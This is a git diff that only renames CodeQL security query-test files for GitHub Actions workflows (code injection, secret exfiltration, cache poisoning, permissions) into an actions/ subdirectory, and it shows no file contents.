diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected
rename to actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected
diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
rename to actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
rename to actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
rename to actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml
rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml
rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml
diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
rename to actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
rename to actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected
diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
rename to actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref
diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
rename to actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
rename to actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
rename to actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
rename to actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected
rename to actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected
diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
rename to actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
rename to actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
rename to actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
rename to actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
rename to actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected
rename to actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected
diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
rename to actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
rename to actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
rename to actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref
